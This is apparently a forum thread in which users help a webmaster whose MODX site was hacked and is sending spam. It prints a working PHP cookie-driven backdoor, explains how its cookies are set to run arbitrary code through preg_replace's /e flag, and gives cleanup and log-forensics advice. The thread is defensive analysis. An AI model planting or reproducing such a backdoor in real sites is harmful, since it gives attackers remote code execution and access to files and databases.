emails sent from server from script placed in a folder

This is definitely malicious PHP code.

A very similar bit of code was found on another server described in http://stackoverflow.com/questions/28461492/execute-php-code-from-cookie

Their code was:

Code:

class PluginJoomla {
  public function __construct() {
  $jq = @$_COOKIE['ContentJQ3'];
  if ($jq) {
  $option = $jq(@$_COOKIE['ContentJQ2']);
  $au=$jq(@$_COOKIE['ContentJQ1']);
  $option("/438/e",$au,438); die();
  }
  else
  phpinfo();die;
  }
}
$content = new PluginJoomla;

An answer there was (change ContentJQ[1-3] to gqffvuvj[1-3] for your code):

"$option("/438/e",$au,438);" means execute $au when $option is preg_replace, because of the /e flag.


With $_COOKIE['ContentJQ3']="base64_decode", $_COOKIE['ContentJQ1']=base64("preg_replace") and $_COOKIE['ContentJQ2']=base64("arbitrary_php_code();"), this in the end executes any php code the hacker likes. It can then be used to download ANY file from your filesystem (that PHP can access; remember open_basedir), do anything you like with your database.

So your website was definitely hacked. My guess is a vulnerability was exploited in your MODx CMS (that filename/path looks like MODx anyways). https://www.exploit-db.com/search/?action=search&description=MODx&e_author= says there's 14 known/public exploits for it.

I would remove siteCache.idx.php immediately, as well as look into your access log to see who's been accessing that file.

 

Err, the moderator accidentally enclosed some of my comments from my last post in code blocks.

Last thing I said was:

"I would remove siteCache.idx.php immediately, as well as look into your access log to see who's been accessing that file."

To determine how the file was uploaded, chances are you can look up the IP address that accessed siteCache.idx.php in the logs and match it up with requests for other php files on the system. If the attacker was mass scanning or using Google to find sites running vulnerable software, the very first request from that IP might be the vulnerable script.

That'll work as long as the attacker wasn't using a different IP for the initial attack than the one used to access siteCache.idx.php. For that you would have to look deeper into your access & error logs for any kind of unusual activity (I.e., hundreds or thousands of requests from the same IP for files that don't exist, or search engine crawler-like behavior from an IP that doesn't match up with any known search engine crawlers).

You should also make sure that any PHP scripts (and addons/plugins/etc.) you're using is the latest version of that script.

There's also the possibility that this was a "0day" exploit (meaning a patch/fix hasn't been released yet to fix the vulnerability). To help lower the chances of those types of exploits from working (at least in PHP scripts), you could use Suhosin and/or ModSecurity.

 

If you find malicious files and you plan on asking your hosting provider to help, don't just remove them right away. This can destroy a lot of the evidence they will need if they are able to assist you. It is generally best to leave things untouched if you plan to hire someone to help so that they can use timestamps of the files to properly hunt through the log files. If you do need to disable the malware it is best to at least "stat" the file first over ssh (i.e. stat whatever.php) and save the output of all timestamps before doing anything else.

 

There are several known issues with older MODX Evolution and Legacy 0.9.x releases, however if the site is running the current release 1.0.15 there shouldn't be any known issues at this time. Your client can upgrade any of the 0.9.x - 1.0.x releases to the current version directly. You cannot upgrade to Revolution directly, however depending on the site upgrading to Revolution should be difficult for a MODX Developer.

That being said if the site is running 1.0.15 and still being exploited you might want to contact MODX so they can patch the issue. You can find the version in the (prefix)_site_settings table.